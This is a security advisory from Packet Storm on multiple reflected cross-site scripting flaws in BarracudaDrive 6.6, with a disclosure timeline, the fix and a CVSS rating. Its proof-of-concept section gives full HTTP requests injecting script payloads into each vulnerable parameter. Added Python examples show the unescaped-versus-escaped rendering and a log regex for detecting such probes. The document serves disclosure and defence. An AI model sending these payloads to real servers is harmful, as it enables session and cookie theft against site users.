BarracudaDrive 6.6 Cross Site Scripting

2014-03-18T00:00:00
ID PACKETSTORM:125766
Type packetstorm
Reporter Prabhu S Angadi
Modified 2014-03-18T00:00:00

Description

                                        
##############################################################################
#  
# Title : BarracudaDrive Multiple XSS Vulnerabilities  
# Author : Prabhu S Angadi SecPod Technologies Pvt. Ltd. http://www.secpod.com  
# Vendor : http://barracudadrive.com  
# Advisory : http://secpod.org/blog/?p=2158  
# http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
# Software : BarracudaDrive 6.6  
# Date : 24/02/2014  
#  
##############################################################################  
  
SecPod ID: 1049

24/02/2014 Issue Discovered
07/03/2014 Vendor Notified  
07/03/2014 Vendor Responded  
13/03/2014 Vendor Solution  
17/03/2014 Advisory Released  
  
  
Class: Cross-Site Scripting
Severity: Medium
  
  
Overview:  
---------  
BarracudaDrive Multiple Reflected Cross-site Scripting Vulnerabilities.  
  
  
Technical Description:  
----------------------  
  
Multiple Reflected Cross-Site Scripting vulnerabilities are present in  
BarracudaDrive, as it fails to properly sanitize user-supplied input.  
  
1) Input passed via the 'sForumName' and 'sDescription' parameters in
'/Forum/manage/ForumManager.lsp?nForumId=1' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
  
2) Input passed via the 'sHint' and 'sWord' parameters in
'/Forum/manage/hangman.lsp?nId=1' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
  
3) Input passed via the 'nId' parameter in '/Forum/manage/hangman.lsp' is
not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
  
4) Input passed via the 'sForumName' and 'sDescription' parameters in
'/Forum/manage/ForumManager.lsp?newforum=true' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
  
5) Input passed via the 'user' parameter in
'/rtl/protected/admin/wizard/setuser.lsp' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
  
6) Input passed via the 'name' and 'email' parameters in '/feedback.lsp'
is not properly verified before it is returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session through the '/private/manage/messages.lsp' or
'/private/manage/messages.lsp?key=1' URIs in the context of a
vulnerable site.
  
7) Input passed via the 'lname' and 'url' parameters in
'/private/manage/PageManager.lsp?parent=0&newpage=true' is not properly
verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
  
8) Input passed via the 'lname' and 'url' parameters in
'/private/manage/PageManager.lsp?parent=0&edit=9' is not properly
verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
  
9) Input passed via the 'cmd' parameter in '/fs' is not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
10) Input passed via the 'newname' and 'description' parameters in
'/rtl/protected/mail/manage/list.lsp' is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
  
11) Input passed via the 'firstname', 'lastname' and 'id' parameters in
'/rtl/protected/mail/manage/list.lsp?name=test' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
  
These vulnerabilities have been tested in BarracudaDrive 6.6. Other versions may
also be affected.
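
The defect described above is a missing output-encoding step: a form value is
written back into the HTML response exactly as submitted. The Python below is
an added illustration, not BarracudaDrive code and not part of this advisory.
It takes the post body from PoC 1 (parameter names 'sForumName' and
'sDescription' as on this page), shows a rendering function that reflects the
values verbatim, and beside it the same page with each value HTML-entity
encoded. The page template and the function names are constructed for the
example.

```python
"""Reflected value written raw into HTML, beside its hardened form.

Added illustration (not BarracudaDrive code): the parameter names and the
post body come from the advisory's PoC 1; the template and functions here
are constructed for demonstration.
"""
import html
from urllib.parse import parse_qs

# Constructed: the body of PoC 1 as the server receives it.
POC_BODY = (
    "nSortOrder=0&sForumName=<script>alert(document.cookie)</script>"
    "&sDescription=<script>alert(document.cookie)</script>"
    "&deleteforum=no&nForumId=1"
)

# Constructed template standing in for the forum-manager form.
TEMPLATE = (
    '<input name="sForumName" value="%s">\n'
    '<textarea name="sDescription">%s</textarea>'
)


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(form: dict) -> str:
    """Reflects the submitted values verbatim: the pattern the advisory describes."""
    return TEMPLATE % (form.get("sForumName", ""), form.get("sDescription", ""))


def render_hardened(form: dict) -> str:
    """Same page, with every reflected value entity-encoded for an HTML context.

    quote=True also encodes the double and single quote, so a value placed
    inside a quoted attribute cannot close the attribute early.
    """
    return TEMPLATE % (
        html.escape(form.get("sForumName", ""), quote=True),
        html.escape(form.get("sDescription", ""), quote=True),
    )


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to show the difference: does a raw <script tag survive?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    form = parse_form(POC_BODY)
    print("--- vulnerable rendering ---")
    print(render_vulnerable(form))
    print("--- hardened rendering ---")
    print(render_hardened(form))
```

Entity encoding covers text and quoted-attribute contexts, which is where the
parameters in items 1 through 6, 10 and 11 land. A value that becomes a link
target, such as the 'url' parameter in items 7 and 8, additionally needs its
scheme checked (http or https only) before it is emitted, because encoding alone
does not stop a javascript: URL. The product fix is the vendor's upgrade noted
under Solution; the snippet only illustrates the class of defect.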
  
  
Impact:  
--------  
Successful exploitation allows an authenticated attacker to execute arbitrary   
HTML and script code in a user's browser session in the context of a   
vulnerable site.  
  
  
Affected Software:  
------------------  
BarracudaDrive 6.6  
  
Tested on:
BarracudaDrive 6.6 on Windows OS  
BarracudaDrive 6.6 on Linux OS  
  
  
References:  
-----------  
http://secpod.org/blog/?p=2158  
http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
  
  
Proof of Concept:  
----------------  
1) POST /Forum/manage/ForumManager.lsp?nForumId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?nForumId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 170  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=1  
  
2) POST /Forum/manage/hangman.lsp?nId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/hangman.lsp?nId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 135  
  
Post Data :   
===========  
sHint=<script>alert(document.cookie)</script>&sWord=<script>alert(document.cookie)</script>&save=Save&nId=1  
  
3) GET /Forum/manage/hangman.lsp?nId=<script>alert(document.cookie)</script>   
(Requires at least one entry in the Word Manager table)
  
4) POST /Forum/manage/ForumManager.lsp?newforum=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?newforum=true  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 171  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=-1  
  
5) POST /rtl/protected/admin/wizard/setuser.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 92  
  
Post Data :   
==========  
user=<script>alert(document.cookie)</script>&password=test&path=/c/bdusers  
  
6) POST /feedback.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Contact-Us.html  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 226  
  
Post Data :  
==========  
name=<script>alert(document.cookie)</script>&email=<script>alert(document.cookie)</script>&message=test&k1=1393176261&k2=652054939&ck1=JBxYStg2gm3CuvlMdKlxsA==&ck2=JxxfTNM1hm7Nu/YxAAAAAA==  
  
The effect will be visible on:
/private/manage/messages.lsp  
/private/manage/messages.lsp?key=1  
  
7) POST /private/manage/PageManager.lsp?parent=0&newpage=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&newpage=true  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 158  
  
Post Data :   
==========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&deletepage=no&parent=0&key=-1  
  
8) POST /private/manage/PageManager.lsp?parent=0&edit=9  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&edit=9  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 174  
  
Post Data :   
===========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&cancel=Cancel&deletepage=no&parent=0&key=9  
  
The effect will be visible on: /private/manage/PageManager.lsp
  
9) GET /fs/?cmd=<script>alert(document.cookie)</script>  
  
10) POST /rtl/protected/mail/manage/list.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 99  
  
Post Data :   
===========  
newname=<script>alert(document.cookie)</script>&description=<script>alert(document.cookie)</script>&save=Create+New+List  
  
The effect will be visible on '/rtl/protected/mail/manage/lists.lsp'
  
11) POST /rtl/protected/mail/manage/list.lsp?name=test  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp?name=test  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 259  
  
Post Data :   
==========  
listkey=2&email=test123@gmail.com&firstname=<script>alert(document.cookie)</script>&lastname=<script>alert(document.cookie)</script>&id=<script>alert(document.cookie)</script>&addsub=save&name=test&offset=0&save=Save  
  
12) GET /fs/<script>alert(document.cookie)</script>   
  
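For administrators who cannot upgrade immediately, the requests listed above
have a recognisable shape in web-server logs. The Python below is an added
example, not part of this advisory and not BarracudaDrive code: it parses a
few constructed Common Log Format lines, restricts attention to the endpoints
named in this advisory, and flags request targets that carry script markup
once URL-decoded. The log lines, the client addresses and the helper names are
constructed for the example.

```python
"""Flag the advisory's XSS probe pattern in web-server access logs.

Added example (not from the advisory or the product). The endpoint list is
taken from the advisory; the log lines below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Paths named in the advisory (the query strings vary per item).
AFFECTED_PATHS = (
    "/Forum/manage/ForumManager.lsp",
    "/Forum/manage/hangman.lsp",
    "/rtl/protected/admin/wizard/setuser.lsp",
    "/feedback.lsp",
    "/private/manage/PageManager.lsp",
    "/fs",
    "/rtl/protected/mail/manage/list.lsp",
)

# Markers of script injection, matched against the URL-decoded request target.
INJECTION_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)

# Common Log Format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2014:10:01:02 +0000] "GET /Forum/manage/hangman.lsp?nId=1 HTTP/1.1" 200 1834
10.0.0.7 - - [17/Mar/2014:10:02:13 +0000] "GET /Forum/manage/hangman.lsp?nId=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1902
10.0.0.7 - - [17/Mar/2014:10:02:40 +0000] "GET /fs/?cmd=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 511
10.0.0.9 - - [17/Mar/2014:10:03:00 +0000] "POST /Forum/manage/ForumManager.lsp?nForumId=1 HTTP/1.1" 302 0
10.0.0.9 - - [17/Mar/2014:10:03:30 +0000] "GET /index.html HTTP/1.1" 200 4096
"""


def parse_line(line: str):
    """Return the CLF fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_affected_path(target: str) -> bool:
    """True when the request path is one of the advisory's endpoints (or below /fs)."""
    path = target.split("?", 1)[0]
    return any(path == p or path.startswith(p + "/") for p in AFFECTED_PATHS)


def looks_injected(target: str) -> bool:
    """Decode the target twice so one layer of double encoding is also caught."""
    decoded = unquote_plus(unquote_plus(target))
    return INJECTION_RE.search(decoded) is not None


def find_xss_probes(log_text: str):
    """Return (ip, method, target) for each line that hits an affected path with markup."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_affected_path(rec["target"]) and looks_injected(rec["target"]):
            hits.append((rec["ip"], rec["method"], rec["target"]))
    return hits


if __name__ == "__main__":
    for ip, method, target in find_xss_probes(SAMPLE_LOG):
        print(f"{ip} {method} {target}")
```

Only the GET items (3, 9 and 12) are visible in a standard access log; the
POST bodies used in the other items never reach the log, so catching those
requires request-body logging or a reverse proxy in front of the server.
Matching on the decoded target rather than the raw line matters because the
payloads arrive percent-encoded, as the second and third sample lines show.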
  
Solution:  
----------  
Upgrade to BarracudaDrive 6.7  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = MEDIUM   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = NONE   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = NONE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)   
CVSS Temporal Score = 3.1   
Risk factor = Medium   
  
  
Credits:  
--------  
Author Prabhu S Angadi of SecPod Technologies has been credited with the   
discovery of this vulnerability.  